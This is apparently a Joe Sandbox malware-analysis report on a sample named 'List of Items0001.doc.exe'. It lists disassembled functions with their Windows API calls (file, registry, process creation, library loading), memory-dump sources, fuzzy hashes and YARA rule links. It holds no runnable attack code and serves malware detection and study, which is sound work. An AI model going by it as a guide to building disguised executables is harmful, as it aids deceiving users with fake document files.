                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040348D
                                                  • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                • SetFilePointer.KERNELBASE(0000530D,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointer$CountTick
                                                • String ID:
                                                • API String ID: 1092082344-0
                                                • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Enum$CloseValue
                                                • String ID:
                                                • API String ID: 397863658-0
                                                • Opcode ID: 91b7ee3e2609278c276b7596eea9c8dfd9b7d1f13b65589bef597d58201fb2b3
                                                • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                • Opcode Fuzzy Hash: 91b7ee3e2609278c276b7596eea9c8dfd9b7d1f13b65589bef597d58201fb2b3
                                                • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID:
                                                • API String ID: 3356406503-0
                                                • Opcode ID: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                • Opcode Fuzzy Hash: 6a8ec2809d4675c6f0e16cb7776b62bce3f2a37e76b53da777b7f2e3d9c2fca9
                                                • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseDeleteValue
                                                • String ID:
                                                • API String ID: 2831762973-0
                                                • Opcode ID: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                • Opcode Fuzzy Hash: a682439353b3c5ec41a25a423dd0a89c01db2d1f450957e818456085bf78355d
                                                • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                • Opcode Fuzzy Hash: d682e64da976263d74778dcd61bd470f9ad8341d2b96c4d867934af8fae03e48
                                                • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                • CloseHandle.KERNEL32(?), ref: 00405C81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3712363035-0
                                                • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                  • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                  • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                  • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
